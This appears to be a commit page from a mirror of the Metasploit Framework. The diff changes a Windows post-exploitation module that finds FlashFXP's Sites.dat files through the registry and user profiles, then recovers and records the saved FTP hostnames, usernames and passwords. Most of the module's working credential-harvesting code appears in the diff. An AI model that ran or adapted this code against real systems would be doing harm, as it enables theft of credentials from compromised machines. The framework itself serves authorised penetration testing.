infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

handle possible nil return value 

git-svn-id: file:///home/svn/framework3/trunk@13879 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Wei Chen 2011-10-11 21:01:22 +00:00
parent 4a73a21277
commit f1f1d16f8b
1 changed files with 26 additions and 25 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

51
modules/post/windows/gather/credentials/flashfxp.rb
View File

@ -18,31 +18,30 @@ class Metasploit3 < Msf::Post
include Msf::Post::Windows::UserProfiles include Msf::Post::Windows::UserProfiles
def initialize(info={}) def initialize(info={})
super( update_info( info, super(update_info(info,
'Name' => 'Windows Gather FlashFXP Saved Password Extraction', 'Name' => 'Windows Gather FlashFXP Saved Password Extraction',
'Description' => %q{ 'Description' => %q{
This module extracts weakly encrypted saved FTP Passwords from FlashFXP. It This module extracts weakly encrypted saved FTP Passwords from FlashFXP. It
finds saved FTP connections in the Sites.dat file. }, finds saved FTP connections in the Sites.dat file. },
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Author' => [ 'TheLightCosine <thelightcosine[at]gmail.com>'], 'Author' => [ 'TheLightCosine <thelightcosine[at]gmail.com>'],
'Version' => '$Revision$', 'Version' => '$Revision$',
'Platform' => [ 'windows' ], 'Platform' => [ 'windows' ],
'SessionTypes' => [ 'meterpreter' ] 'SessionTypes' => [ 'meterpreter' ]
)) ))
end end
def run def run
@fxppaths = []
#Checks if the Site data is stored in a generic location for all users #Checks if the Site data is stored in a generic location for all users
flash_reg = "HKLM\\SOFTWARE\\FlashFXP" flash_reg = "HKLM\\SOFTWARE\\FlashFXP"
flash_reg_ver = registry_enumkeys("#{flash_reg}") flash_reg_ver = registry_enumkeys("#{flash_reg}")
#Ini paths
@fxppaths = []
unless flash_reg_ver.nil? unless flash_reg_ver.nil?
software_key = "#{flash_reg}\\#{flash_reg_ver.join}" software_key = "#{flash_reg}\\#{flash_reg_ver.join}"
generic_path = registry_getvaldata(software_key, "InstallerDataPath") generic_path = registry_getvaldata(software_key, "InstallerDataPath") || ""
unless generic_path.include? "%APPDATA%" unless generic_path.include? "%APPDATA%"
@fxppaths << generic_path + "\\Sites.dat" @fxppaths << generic_path + "\\Sites.dat"
end end
@ -68,7 +67,7 @@ class Metasploit3 < Msf::Post
@fxppaths << "#{path}#{sub}\\Sites.dat" @fxppaths << "#{path}#{sub}\\Sites.dat"
end end
rescue rescue
print_status("The following path could not be accessed or does not exist: #{path}") print_error("The following path could not be accessed or does not exist: #{path}")
end end
end end
@ -77,9 +76,11 @@ class Metasploit3 < Msf::Post
config = client.fs.file.new(filename,'r') config = client.fs.file.new(filename,'r')
parse = config.read parse = config.read
ini = Rex::Parser::Ini.from_s(parse) ini = Rex::Parser::Ini.from_s(parse)
if ini == {} if ini == {}
print_status("Unable to parse file, may be encrypted using external password: #{filename}") print_error("Unable to parse file, may be encrypted using external password: #{filename}")
end end
ini.each_key do |group| ini.each_key do |group|
host = ini[group]['IP'] host = ini[group]['IP']
username = ini[group]['user'] username = ini[group]['user']
@ -90,12 +91,12 @@ class Metasploit3 < Msf::Post
print_good("*** Host: #{host} Port: #{port} User: #{username} Password: #{passwd} ***") print_good("*** Host: #{host} Port: #{port} User: #{username} Password: #{passwd} ***")
report_auth_info( report_auth_info(
:host => host, :host => host,
:port => port, :port => port,
:sname => 'FTP', :sname => 'FTP',
:user => username, :user => username,
:pass => passwd :pass => passwd
) )
end end
rescue rescue
print_status("Either could not find or could not open file #{filename}") print_status("Either could not find or could not open file #{filename}")